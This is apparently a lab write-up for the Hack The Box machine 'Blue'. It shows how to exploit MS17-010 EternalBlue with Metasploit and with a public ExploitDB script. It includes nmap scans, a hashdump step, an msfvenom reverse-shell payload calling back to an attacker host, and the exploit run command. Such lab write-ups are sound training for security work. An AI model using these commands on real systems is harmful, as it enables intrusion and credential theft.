Blue
Nmap Scanning
I will begin with an nmap scan to find open ports on the machine, the services running on them, their versions, and also perform OS detection.
$ nmap -A -T4 -p- 10.10.10.40 -Pn
We get some info back. The OS is Windows 7 Pro 7601 SP1. The computer name is haris-PC, and more... (refer to screenshot)
Using Metasploit
Enumeration with Metasploit
From the machine name (Blue), and ports 139 and 445 being open, as well as the OS being Windows 7, my first thought is that we will probably use the eternalblue exploit on this machine. I will use msfconsole to run a scan on the machine to make sure that it's vulnerable to ms17-010 (aka eternalblue).
After setting the options, I run the scanner. I receive feedback that the machine is likely vulnerable to ms17-010. It even performs OS detection which confirms for us that the machine is indeed running on Windows 7 Pro 7601 SP1.
Exploiting with Metasploit
We will now use the metasploit module of exploit/windows/smb/ms17_010_eternalblue to pwn the box.
You may need to run it multiple times before you get a shell. You can also experiment with changing the payload.
To check if we are admin when using meterpreter shell, we use the command getuid. We can also dump the hashes using the command hashdump (on meterpreter). We can now navigate through the system and retrieve both the user and root flags. Privesc is not necessary.
Without Metasploit
Enumerating with Nmap Scripting Engine (NSE)
Following up from our nmap scans, we can run a script using nmap to find out if the machine is vulnerable to ms17-010. The script we will run is smb-vuln-ms17-010.
$ nmap -p 139,445 --script smb-vuln-ms17-010 10.10.10.40 -Pn
We will search for a non-metasploit exploit in the Exploit database.
Since we are working with Windows 7, we’ll use exploit # 42315. Clone the exploit into the working directory.
$ searchsploit -m 42315.py
The -m flag Mirrors (aka copies) an exploit to the current working directory.
After looking at the source code, we need to do three things:
Download mysmb.py since the exploit imports it. The download location is included in the exploit.
Use MSFvenom to create a reverse shell payload (allowed on the OSCP as long as you’re not using meterpreter).
Make changes in the exploit to add the authentication credentials and the reverse shell payload.
Since I already have mysmb.py, I will go ahead with creating a reverse shell payload using msfvenom.
$ msfvenom -p windows/shell_reverse_tcp -f exe LHOST=10.10.14.3 LPORT=4444 > eternal-blue.exe
Third, we need to change the exploit to add credentials. In our case we don’t have valid credentials, however, let’s check to see if guest login is allowed.
If we run enum4linux, we can see that guest login is supported.
$ enum4linux -a 10.10.10.40The -a flag stands for Do all simple enumeration.
We will add guest login to the exploit script.
Similarly, we’ll add the reverse shell executable location and get the script to execute it.
Now that we have done all 3 tasks, set up a listener on your attack machine.
Now let's run the exploit.
We will now download the public exploit code for ms17-010 from the link below:
Included is also an enternal blue checker script that allows us to test if our target is potentially vulnerable to MS17-010
Let's run ./shell_prep.sh and set up our configurations.
Since we want to avoid using metasploit (OSCP STYLE), we will generate a regular cmd shell. (Fortunately, msfvenom is allowed on OSCP).
After the script finishes there will be a shellcode binary named sc_all.bin in the shellcode directory. Next, open up a new tab on your terminal and set up a listener. Make sure the port you specify is similar to the one you specified in the above screenshot. Since we know the OS is 64-bit, I have specified port 4444 to be opened. It's the same port I specified in the screenshot above.
Once done, we are now ready to pwn the target.
run:
python eternalblue_exploit7.py <TARGET-IP> <PATH/TO/SHELLCODE/sc_all.bin> <Number of Groom Connections (optional)>
Last updated
Was this helpful?